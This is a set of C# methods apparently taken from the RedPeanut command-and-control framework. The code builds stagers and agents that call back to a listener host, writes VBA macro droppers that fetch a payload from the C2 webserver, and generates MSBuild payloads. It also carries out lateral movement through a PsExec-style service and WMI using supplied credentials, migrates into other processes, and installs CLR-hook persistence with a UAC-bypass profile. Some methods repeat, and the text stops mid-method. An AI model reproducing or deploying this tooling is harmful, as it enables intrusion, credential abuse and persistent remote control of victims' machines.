public void UpdateListenerConfig(string listenername, ListenerConfig listenerconfig)
{
try
{
listeners.Remove(listenerconfig.GetName());
Listener res = dbcontext.Listeners.FirstOrDefault <Listener>(s => s.name == listenerconfig.GetName());
res.name = listenerconfig.GetName();
res.lhost = listenerconfig.GetHost();
res.lport = listenerconfig.GetPort();
res.profile = listenerconfig.GetProfileid();
if (listenerconfig.GetSsl())
{
res.ListenerType = ListenerType.Https;
}
else
{
res.ListenerType = ListenerType.Http;
}
dbcontext.Listeners.Update(res);
dbcontext.SaveChanges();
}
catch (Exception)
{
Console.WriteLine("[x] Error removing listener");
}
}
public void StartServerHttpServer(ListenerConfig lconfig)
{
httplistener = new RedPeanutC2(this, lconfig);
servert = new Thread(new ThreadStart(httplistener.Execute));
servert.Start();
lconfig.SetStarted(true);
}
//Send agentid
//RC4 with serverkey
private string CreateMsgAgentId(IAgentInstance agent, string serverkey, int profileid, int targetframework)
{
string mesg = "";
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
{
AesManaged aes = agent.AesManager;
AgentIdMsg msg = new AgentIdMsg
{
agentid = agent.AgentId,
sessionkey = aes.Key,
sessioniv = aes.IV
};
HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(profileid);
ListenerConfig conf = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), profile, profileid);
string source = System.IO.File.ReadAllText(Path.Combine(folderrpath, AGENT_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
msg.stage = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, agent.AgentId + ".dll", targetframework, compprofile: CompilationProfile.Agent)));
string agentidnmsg = JsonConvert.SerializeObject(msg, Formatting.Indented);
mesg = EncryptMessage(serverkey, agentidnmsg);
}
return(mesg);
}
private void Run()
{
List <string> args = new List <string>();
try
{
if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
{
return;
}
else
{
// Parse .cs sorce and repalce variable
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
Builder.GenerateExe(source, filename);
}
}
}
catch (Exception e)
{
Console.WriteLine("[*] Error running task build {0}", e.Message);
return;
}
}
private void Run()
{
List <string> args = new List <string>();
if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
{
return;
}
else
{
//Create stager stream gzip
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
if (lpipename == null)
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
//Create TaskMsg gzip
if (agent != null)
{
//Create Service stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
.Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);
string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));
//Create SharpPsExec stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
.Replace("#DOMAIN#", domain)
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#HOSTANME#", targethost)
.Replace("#ASSEMBLY#", servicestr)
.Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
.Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
.Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
.Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));
string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
}
}
}
}
static private void CheckConfiguredListeners(C2Server srv)
{
RedPeanutDBContext context = srv.GetDBContext();
if (context.Listeners.Count() > 0)
{
Console.WriteLine("[*] Starting listeners");
foreach (Listener l in context.Listeners)
{
int profileid = l.profile;
string name = l.name;
string lhost = l.lhost;
int lport = l.lport;
bool ssl = (l.ListenerType == ListenerType.Https) ? true : false;
if (profileid != 0 && srv.GetProfiles().ContainsKey(profileid))
{
HttpProfile profile = srv.GetProfile(profileid);
ListenerConfig conf = new ListenerConfig(name, lhost, lport, profile, profileid, ssl);
srv.ReloadListenerConfig(name, conf);
srv.StartServerHttpServer(conf);
}
else
{
HttpProfile profile = srv.GetProfile(srv.GetDefaultProfile());
ListenerConfig conf = new ListenerConfig(name, lhost, lport, profile, profileid, ssl);
srv.ReloadListenerConfig(name, conf);
srv.StartServerHttpServer(conf);
}
}
}
}
private void Run()
{
if (!srv.IsStarted(name))
{
if (!string.IsNullOrEmpty(lhost) && lport > 0 && !string.IsNullOrEmpty(name))
{
HttpProfile profile;
if (profileid != 0 && srv.GetProfiles().ContainsKey(profileid))
{
profile = srv.GetProfile(profileid);
}
else
{
profile = srv.GetProfile(srv.GetDefaultProfile());
profileid = srv.GetDefaultProfile();
}
ListenerConfig conf = new ListenerConfig(name, lhost, lport, profile, profileid, ssl);
srv.RegisterListenerConfig(name, conf);
srv.StartServerHttpServer(conf);
}
else
{
Console.WriteLine("[-] pipename can't be null");
}
}
else
{
Console.WriteLine("[-] Server running");
}
}
public static string ReplaceAgentShooter(string src, string resourceurl, ListenerConfig config)
{
string source = src
.Replace("#HOST#", config.GetHost())
.Replace("#PORT#", config.GetPort().ToString())
.Replace("#RESURLCEURL#", resourceurl);
return(source);
}
private void Run()
{
List <string> args = new List <string>();
try
{
if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
{
return;
}
else
{
// Parse .cs sorce and repalce variable
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
//Building agent
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
string outfilename = RandomAString(10, new Random()) + ".dll";
Builder.GenerateDll(source, outfilename, 35);
//Add resource to webserver
C2Manager c2manager = Program.GetC2Manager();
c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));
string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
if (!uricontent.EndsWith("/"))
{
uricontent += "/";
}
string resourcepath = uricontent + outfilename;
//Build shooter assembly
source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);
string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);
VBAGenerator gen = new VBAGenerator(assemblyBase64, null);
//Write file to dest dir
string destdir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER);
File.WriteAllText(Path.Combine(destdir, filename), gen.GetScriptText());
Console.WriteLine("[*] {0} Created", Path.Combine(destdir, filename));
}
}
}
catch (Exception e)
{
Console.WriteLine("[*] Error running task build {0}", e.Message);
return;
}
}
private void Run()
{
List <string> args = new List <string>();
try
{
if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
{
return;
}
else
{
// Parse .cs sorce and repalce variable
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
string assemblyBase64 = Builder.GenerateDllBase64(source, filename);
byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte));
Dictionary <string, string> msbuildargs = new Dictionary <string, string>();
msbuildargs.Add("#{taskname}", taskname);
MSBuildGenerator gen = new MSBuildGenerator(agentCompBase64, msbuildargs);
if (hosted)
{
//Add resource to webserver storage
C2Manager c2manager = Program.GetC2Manager();
c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
Console.WriteLine("[*] Resource added to webserver resources");
return;
}
else
{
//Write file to tmp env dir
File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
}
}
}
}
catch (Exception e)
{
Console.WriteLine("[*] Error running task build {0}", e.Message);
return;
}
}
public void RemoveListenerConfig(ListenerConfig listenerconfig)
{
try
{
listeners.Remove(listenerconfig.GetName());
Listener res = dbcontext.Listeners.FirstOrDefault <Listener>(s => s.name == listenerconfig.GetName());
dbcontext.Listeners.Remove(res);
dbcontext.SaveChanges();
}
catch (Exception)
{
Console.WriteLine("[x] Error removing listener");
}
}
private void ListenerMenu(string input)
{
string f_input = ParseSelection(input);
if (!string.IsNullOrEmpty(input))
{
if (mainmenu.ContainsKey(f_input.TrimEnd()))
{
switch (f_input.TrimEnd())
{
case "remove":
if (Program.GetC2Manager().GetC2Server().GetListenersConfig().ContainsKey(listenername))
{
try
{
ListenerConfig lc = Program.GetC2Manager().GetC2Server().GetListenersConfig()[listenername];
lc.CancellationTokenSource.Cancel();
Program.GetC2Manager().GetC2Server().RemoveListenerConfig(lc);
}catch (Exception)
{}
exit = true;
}
break;
case "set listenername":
listenername = GetParsedSetString(input);
break;
case "options":
PrintOptionsNoStd("options", mainmenu);
break;
case "back":
Program.GetMenuStack().Pop();
exit = true;
return;
default:
Console.WriteLine("We had a woodoo");
break;
}
}
else
{
PrintOptionsNoStd("Command not found", mainmenu);
}
}
}
private void RunMigrate(int pid)
{
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
//Create RedPeanutAgent assembly
string source = File.ReadAllText(Path.Combine(folderrpath, AGENT_TEMPLATE));
ListenerConfig conf = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), RedPeanutC2.server.GetProfile(((AgentInstanceHttp)agent).GetProfileid()), ((AgentInstanceHttp)agent).GetProfileid());
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), ((AgentInstanceHttp)agent).TargetFramework, conf);
string b64CompressedAgent = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, agent.AgentId + ".dll", ((AgentInstanceHttp)agent).TargetFramework, compprofile: CompilationProfile.Agent)));
string instanceid = RandomAString(10, new Random());
//Create AgentState
AgentState astate = new AgentState
{
Agentid = agent.AgentId,
sessionkey = agent.AesManager.Key,
sessioniv = agent.AesManager.IV,
cookie = ((AgentInstanceHttp)agent).Cookie,
RequestInstanceid = instanceid
};
if (agent.Pivoter != null)
{
astate.pipename = agent.Pivoter.AgentId;
}
string b64State = Convert.ToBase64String(Utility.CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(astate, Formatting.Indented))));
string[] argsm = Utility.Split(b64State, 100).ToArray();
//Read template
source = File.ReadAllText(Path.Combine(folderrpath, MIGRATE_TEMPLATE));
//Replace
source = Replacer.ReplaceMigrate(source, Convert.ToBase64String(CompressGZipAssembly(
Builder.GenerateShellcode(b64CompressedAgent, RandomAString(10, new Random()) + ".exe", "RedPeanutAgent.Worker", "LoadAndRun", argsm)
)), pid);
//Run
string migrate = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", ((AgentInstanceHttp)agent).TargetFramework, compprofile: CompilationProfile.Migrate)));
RunAssemblyBase64(
migrate,
"RedPeanutMigrate",
new string[] { " " },
agent, tasktype: "migrate", instanceid: instanceid);
}
public void ListListeners()
{
if (GetListenersConfig() != null)
{
foreach (KeyValuePair <string, ListenerConfig> item in GetListenersConfig())
{
try
{
ListenerConfig listenerConfig = item.Value;
Console.WriteLine("[*] {0} | Host: {1} | port: {2} | profile: {3}", listenerConfig.GetName(), listenerConfig.GetHost(), listenerConfig.GetPort(), listenerConfig.GetProfileid());
}
catch (Exception e)
{
Console.WriteLine("[x] Listener need to be removed {0}", e.Message);
}
}
}
}
public void ReloadListenerConfig(string listenername, ListenerConfig listenerconfig)
{
try
{
if (!listeners.ContainsKey(listenername))
{
listeners.Add(listenername, listenerconfig);
}
else
{
Console.WriteLine("[x] Listener already exist");
}
}
catch (Exception e)
{
Console.WriteLine("[x] Error adding listener {0}", e.Message);
}
}
public void RegisterListenerConfig(string listenername, ListenerConfig listenerconfig)
{
try
{
if (!listeners.ContainsKey(listenername))
{
listeners.Add(listenername, listenerconfig);
Listener listener = dbcontext.Listeners.FirstOrDefault <Listener>(s => s.name == listenername);
if (listener == null)
{
listener = new Listener
{
name = listenerconfig.GetName(),
lhost = listenerconfig.GetHost(),
lport = listenerconfig.GetPort(),
profile = listenerconfig.GetProfileid(),
};
if (listenerconfig.GetSsl())
{
listener.ListenerType = ListenerType.Https;
}
else
{
listener.ListenerType = ListenerType.Http;
}
dbcontext.Listeners.Add(listener);
dbcontext.SaveChanges();
}
}
else
{
Console.WriteLine("[x] Listener already exist");
}
}
catch (Exception e)
{
Console.WriteLine("[x] Error adding listener {0}", e.Message);
}
}
public void ListListeners()
{
if (GetListenersConfig() != null)
{
Console.WriteLine("[*] {0}", new string('-', 66));
Console.WriteLine("[*] | {0,-20} | {1,-15} | {2,-5} | {3,-7} | {4,-5} |", "Name", "IP", "Port", "Profile", "SSL");
Console.WriteLine("[*] {0}", new string('-', 66));
foreach (KeyValuePair <string, ListenerConfig> item in GetListenersConfig())
{
try
{
ListenerConfig listenerConfig = item.Value;
Console.WriteLine("[*] | {0,-20} | {1,-15} | {2,-5} | {3,-7} | {4,-5} |", listenerConfig.GetName(), listenerConfig.GetHost(), listenerConfig.GetPort(), listenerConfig.GetProfileid(), listenerConfig.GetSsl());
}
catch (Exception e)
{
Console.WriteLine("[x] Listener need to be removed {0}", e.Message);
}
}
Console.WriteLine("[*] {0}", new string('-', 66));
}
}
private void Run()
{
try
{
string host = ((AgentInstanceHttp)agent).GetAddress();
int port = ((AgentInstanceHttp)agent).GetPort();
int profileid = ((AgentInstanceHttp)agent).GetProfileid();
int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
string pipename = "";
if (agent.Pivoter != null)
{
host = agent.Pivoter.SysInfo.Ip;
port = 0;
profileid = RedPeanutC2.server.GetDefaultProfile();
targetframework = agent.TargetFramework;
pipename = agent.AgentId;
}
else
{
host = ((AgentInstanceHttp)agent).GetAddress();
port = ((AgentInstanceHttp)agent).GetPort();
profileid = ((AgentInstanceHttp)agent).GetProfileid();
targetframework = agent.TargetFramework;
}
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
{
string source;
if (string.IsNullOrEmpty(pipename))
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
ModuleConfig modconfig = new ModuleConfig
{
Assembly = stagerstr,
Method = "Execute",
Moduleclass = "RedPeanutRP",
Parameters = new string[] { "pippo" }
};
TaskMsg task = new TaskMsg
{
TaskType = "module",
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
.Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLRWNF))
.Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
.Replace("#SHELLCODE#", null)
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#DOMAIN#", domain)
.Replace("#PROCESS#", null);
string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
RunAssemblyBase64(
spawnprocess,
"RedPeanutSpawn",
new string[] { " " },
agent);
}
}
catch (Exception)
{
Console.WriteLine("[*] Errore generating task");
}
}
private void Run()
{
List <string> args = new List <string>();
if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
{
return;
}
else
{
//Create stager stream gzip
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
if (lpipename == null)
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40)));
//Create TaskMsg gzip
if (agent != null)
{
ModuleConfig modconfig = new ModuleConfig
{
Assembly = stagerstr,
Method = "Execute",
Moduleclass = "RedPeanutRP",
Parameters = new string[] { "pippo" }
};
TaskMsg task = new TaskMsg
{
TaskType = "module",
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
//Create Service stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
.Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLR))
.Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);
string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));
//Create SharpPsExec stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
.Replace("#DOMAIN#", domain)
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#HOSTANME#", targethost)
.Replace("#ASSEMBLY#", servicestr)
.Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
.Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
.Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
.Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));
string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
}
}
}
}
private void Run()
{
try
{
string host = ((AgentInstanceHttp)agent).GetAddress();
int port = ((AgentInstanceHttp)agent).GetPort();
int profileid = ((AgentInstanceHttp)agent).GetProfileid();
int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
string pipename = "";
if (!string.IsNullOrEmpty(process))
{
if (agent.Pivoter != null)
{
host = agent.Pivoter.SysInfo.Ip;
port = 0;
profileid = RedPeanutC2.server.GetDefaultProfile();
targetframework = agent.TargetFramework;
pipename = agent.AgentId;
}
else
{
host = ((AgentInstanceHttp)agent).GetAddress();
port = ((AgentInstanceHttp)agent).GetPort();
profileid = ((AgentInstanceHttp)agent).GetProfileid();
targetframework = agent.TargetFramework;
}
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
{
string source;
if (string.IsNullOrEmpty(pipename))
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
string hookfilename = RandomAString(10, new Random()) + ".dll";
//string clrhook = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, hookfilename, targetframework, compprofile: CompilationProfile.PersistenceCLR)));
string keyfilename = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, KEYFILE_FOLDER, "key.snk");
if (clrversion != 35 && clrversion != 40)
{
clrversion = 40;
}
source = File.ReadAllText(Path.Combine(folderrpath, CLRHOOKINSTALL_TEMPLATE))
.Replace("#KEYFILE#", Convert.ToBase64String(CompressGZipAssembly(File.ReadAllBytes(keyfilename))))
.Replace("#STAGER#", stagerstr)
.Replace("#FILENAME#", hookfilename)
.Replace("#PROCESS#", process)
.Replace("#CLRVERSION#", clrversion.ToString());
string clrhookinstaller = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
if (uninstall)
{
RunAssemblyBase64(clrhookinstaller, "PersCLRInstall", new string[] { "cleanenv" }, agent);
}
else
{
RunAssemblyBase64(clrhookinstaller, "PersCLRInstall", new string[] { "install" }, agent);
}
}
}
}
catch (Exception)
{
Console.WriteLine("[*] Errore generating task");
}
}
private void Run()
{
try
{
if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(lhost) || (string.IsNullOrEmpty(lpipename) && lport < 1) || profile < 1)
{
return;
}
else
{
// Parse .cs sorce and repalce variable
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
string domainname = ".";
if (!string.IsNullOrEmpty(domain))
{
domainname = domain;
}
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
if (lpipename == null)
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
//Create TaskMsg gzip
if (agent != null)
{
source = File.ReadAllText(Path.Combine(folderrpath, SPAWNER_TEMPLATE))
.Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn)
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#DOMAIN#", domain);
string spawner = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
Dictionary <string, string> msbuildargs = new Dictionary <string, string>();
msbuildargs.Add("#{taskname}", taskname);
MSBuildGenerator gen = new MSBuildGenerator(spawner, msbuildargs);
string pathdest = string.Format(@"\\{0}\C$\Windows\temp", targethost);
string filename = RandomAString(10, new Random()).ToLower() + ".xml";
string filesrc = Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(gen.GetScriptText())));
string destinattionfull = pathdest.TrimEnd('\\') + @"\" + filename;
string destinationpath = ".";
if (!string.IsNullOrEmpty(pathdest))
{
destinationpath = pathdest.Replace("\\", "\\\\");
}
string destinationfilename = "";
if (!string.IsNullOrEmpty(filename))
{
destinationfilename = filename;
}
// Parse .cs sorce and repalce variable
source = File.ReadAllText(Path.Combine(folderrpath, FILEUPLOAD_TEMPLATE));
source = Replacer.ReplaceFileUpLoad(source, filesrc, destinationpath, destinationfilename, username, password, domainname);
string assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, "FileUpLoader.dll", 40)));
//Task agent to copy file to target host
RunAssemblyBase64(assembly, "FileUpLoader", new string[] { "pippo" }, agent);
//Run msbuld via wmi
List <string> args = new List <string>();
args.Add("action=create");
args.Add("computername=" + targethost);
args.Add("username="******"\\" + username);
args.Add("password="******"command=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Windows\\temp\\" + destinationfilename);
string s = "";
foreach (string ss in args.ToArray())
{
s += ss;
}
Console.WriteLine("String command: " + s);
RunAssembly(PL_MODULE_SHARPWMI, "SharpWMI.Program", args.ToArray(), agent);
}
}
}
} catch (Exception e)
{
Console.WriteLine("[*] Error running task build {0}", e.Message);
}
}
private void Run()
{
List <string> args = new List <string>();
try
{
if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
{
return;
}
else
{
// Parse .cs sorce and repalce variable
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
string assemblyBase64 = Builder.GenerateDllBase64(source, "tmp_" + filename);
byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte));
